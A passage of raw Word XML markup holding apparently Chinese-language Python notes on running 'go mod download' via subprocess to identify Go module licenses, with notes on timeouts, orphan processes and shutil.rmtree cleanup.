        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFF00"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">try except </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFF00"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>语句接收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFF00"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFF00"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>抛出的异常，容易导致孤儿进程诞生。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFF00"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFF00"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>超市不会自己杀死子进程，只会抛出异常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1387447A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>outs, errs = golang_mod_download_process.communicate(timeout=2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475ABC62" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>golang_mod_download_process.poll() == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF9E10D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>获取程序运行结束的结束码，通常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>为正常返回</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533BADAD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>golang_mod_download_process.kill()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3382ACBA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        license_mod = re.search('&gt;&gt;&gt;&gt;(.*?)&lt;&lt;&lt;&lt;', outs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37291E1C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        if license_mod != None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F74D709" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正确匹配返回许可名字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006A5D53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            return (license_mod.group(1), outs + errs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8ADF98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B084A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际测试数据，一般是没有这个分支的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DE46D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            log_data.error(golang_mod + '\t' * 2 + 'None')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714F5BA6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            return ('Failed: Identified but no res:' + license_path, outs + errs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7BD117" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0511147C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        golang_mod_download_process.kill()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4B8434" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1BB0B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        # identify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测失败，这里自行检测一下协议减少误报概率</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> license_path </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为协议路径，自行扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1056E64D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        res = detect_license_self(license_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CDC394" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        if res != None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D4FA08" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            return (res, None)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2588C2B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA3076E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        log_data.error(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B60C0BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            "LICENSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: {GOLANG_MOD}\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: {OUTS}\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: {ERRS}".format(GOLANG_MOD=golang_mod, OUTS=outs, ERRS=errs))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CEA17F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>license</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是检测失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47165DA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return ('Failed: Not identify license:' + license_path, outs + errs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4012B0D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28163F22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7880C2D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一段如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBF4A27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B8CC636" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def download_mod(purl, GOPATH_arg, identify_license_PATH_arg, GO_BIN_PATH_arg):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329CCBD3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    '''</w:t>
      </w:r>
      <w:r>
        <w:t>传入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">purl, </w:t>
      </w:r>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>download_mod('pkg:golang/k8s.io/kubernetes/staging/src/k8s.io/kube-proxy@v0.0.0-20200903233940-a9f1d72e1de6')'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44443F0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    global GOPATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09340163" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    GOPATH = GOPATH_arg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B25EBC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    global identify_license_PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D2658A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    identify_license_PATH = identify_license_PATH_arg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8E46D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    global GO_BIN_PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F404233" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    GO_BIN_PATH = GO_BIN_PATH_arg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F38A327" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD7D621" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    golang_mod = re.search('pkg:golang/(.*)', purl).group(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153E63FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    golang_mod_download_command = "{GO_BIN_PATH} mod download ".format(GO_BIN_PATH=GO_BIN_PATH) + unquote(golang_mod)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158EBD00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF5658B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    args = shlex.split(golang_mod_download_command)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24455659" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="130E4770" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    golang_mod_download_process = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D74285" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                   stderr=subprocess.PIPE, universal_newlines=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1FAFF3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    golang_mod_download_process.wait(20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ADC9A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    outs, errs = golang_mod_download_process.communicate(timeout=2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161D02DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7203251B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if golang_mod_download_process.poll() == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB37AAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        golang_mod_download_process.kill()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697691C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:t>下面向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> identify_license(golang_mod) </w:t>
      </w:r>
      <w:r>
        <w:t>传参</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C318B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        # golang_mod </w:t>
      </w:r>
      <w:r>
        <w:t>的传参类似于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 'k8s.io/kubernetes/staging/src/k8s.io/kube-proxy@v0.0.0-20200903233940-a9f1d72e1de6'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B972E3E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return identify_license(golang_mod)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D5E89A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06491AE4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        golang_mod_download_process.kill()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D99401F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        log_data.error(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3DC4F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:r>
        <w:t>下载返回值非</w:t>
      </w:r>
      <w:r>
        <w:t>0:{GOLANG_MOD}\n</w:t>
      </w:r>
      <w:r>
        <w:t>标准输出</w:t>
      </w:r>
      <w:r>
        <w:t>: {OUTS}\n</w:t>
      </w:r>
      <w:r>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:t>: {ERRS}".format(GOLANG_MOD=golang_mod, OUTS=outs, ERRS=errs))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB8F404" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">go mod download </w:t>
      </w:r>
      <w:r>
        <w:t>下载失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11762C93" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return ('Failed: go mod download', outs + errs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D98C530" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68D1AEB5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F2841BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566E4C98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607D3CC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F90BAA4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E54E917" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="500" w:name="_Toc159779940"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shutil</w:t>
      </w:r>
      <w:bookmarkEnd w:id="500"/>
    </w:p>
    <w:p w14:paraId="0A7EE416" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="501" w:name="_Toc159779941"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shutil.rmtree:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除全部子目录树</w:t>
      </w:r>
      <w:bookmarkEnd w:id="501"/>
    </w:p>
    <w:p w14:paraId="4100D378" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shutil.rmtree(GOPATH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BD7444" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A222E18" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C4F1CF2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="502" w:name="_Toc159779942"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>six</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：解决</w:t>
